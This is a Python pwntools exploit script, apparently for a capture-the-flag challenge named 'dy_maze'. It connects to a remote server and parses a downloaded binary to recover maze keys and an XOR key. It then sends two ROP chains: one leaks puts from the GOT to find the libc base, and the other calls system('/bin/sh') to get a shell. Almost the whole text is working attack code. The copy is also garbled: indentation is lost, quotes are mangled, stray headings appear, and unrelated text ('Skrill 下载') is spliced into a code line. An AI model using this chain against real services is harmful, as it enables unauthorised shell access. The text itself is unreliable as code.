from pwn import *
from LibcSearcher import *
from binascii import a2b_base64
import os
context(log_level=’debug’, os=’linux’, arch=’amd64′, bits=64)
context.terminal = [‘/usr/bin/x-terminal-emulator’, ‘-e’]
Interface
local = False
binary_name = “dy_maze”
binary_name = “38a5a00c-08ac-11ec-b124-0242ac110003”
port = 44212
if local:
p = process(["./" + binary_name])
e = ELF("./" + binary_name)
# libc = e.libc
else:
p = remote("47.104.169.32", port)
def z(a=”):
if local:
gdb.attach(p, a)
if a == '':
raw_input()
else:
pass
ru = lambda x: p.recvuntil(x)
rc = lambda x: p.recv(x)
sl = lambda x: p.sendline(x)
sd = lambda x: p.send(x)
sla = lambda delim, data: p.sendlineafter(delim, data)
def encode(payload, offset):
# encode
payload_encoded = b''
for i in range(len(payload)):
payload_encoded += (payload[i] ^ success_temp[(i + offset) % 5]).to_bytes(1, 'little')
return payload_encoded
Others
success_temp = []
Main
if name == “__main__”:
# z('b maze_25')
z('b ok_success\n')
initialize
p.recvuntil(b’Solution?’)
confirm = input()
sl(confirm)
Create binary file
ru(b’Binary Download Start’)
ru(b’\n’)
b64_data = p.recvuntil(b’\n==’, drop=True)
with open(‘temp.bz2’, ‘wb’) as f:
f.write(a2b_base64(b64_data))
ru(b’\n’)
temp_binary = Skrill 下载 os.popen(‘tar -xjvf temp.bz2’).read().strip(‘\n’)
e = ELF(“./” + temp_binary)
# Start ELF Analysis
d = {}
for i in range(1, 81):
d[i] = e.symbols['maze_{}'.format(i)]
maze_address = sorted(d.items(), key=lambda x: x[1])
key = {}
for ind, addr in zip(range(80), e.search(b'\x83\xc0\x01')):
addr -= 4
while e.data[e.vaddr_to_offset(addr): e.vaddr_to_offset(addr) + 3] != b'\x83\x7d\xfc': addr -= 1
key[maze_address[ind][0]] = e.data[e.vaddr_to_offset(addr) + 3]
for addr in e.search(b'\x48\x98\x88\x54\x05\xEC'):
success_temp.append(e.data[e.vaddr_to_offset(addr) - 1])
prdi = next(e.search(b'\x5f\xc3'))
# End Analysis
# key[80] = 32
payload = b''
for i in range(1, 81):
payload += str(key[i]).encode('utf-8') + b' '
# ok_success
payload += str(100).encode('utf-8')
sl(payload)
sleep(2)
# p.recvall()
ru(b'Good')
# sl(b'100')
sleep(2)
# input your name:
payload = b'a' * 0x14 + b'b' * 8 + p64(prdi) + p64(e.got['puts']) + p64(e.plt['puts']) + p64(e.symbols['ok_success'])
sl(encode(payload, 0))
# sl(payload)
sleep(2)
ru(b'name:')
puts_addr = p.recvuntil(b'\n', drop=True).ljust(8, b'\x00')
puts_addr = u64(puts_addr)
log.success("puts addr found:" + hex(puts_addr))
libc = LibcSearcher('puts', puts_addr)
# libc.select_libc(9)
libc_base = puts_addr - libc.dump('puts')
log.success('libc base found:' + hex(libc_base))
p.sendlineafter(b'length', str(100).encode('utf-8'))
# Attacking:
payload = b'a' * 0x14 + b'b' * 8 + p64(prdi) + p64(libc.dump('str_bin_sh') + libc_base)
payload += p64(prdi + 1) + p64(libc.dump('system') + libc_base)
sla(b'name:', encode(payload, 1))
p.interactive()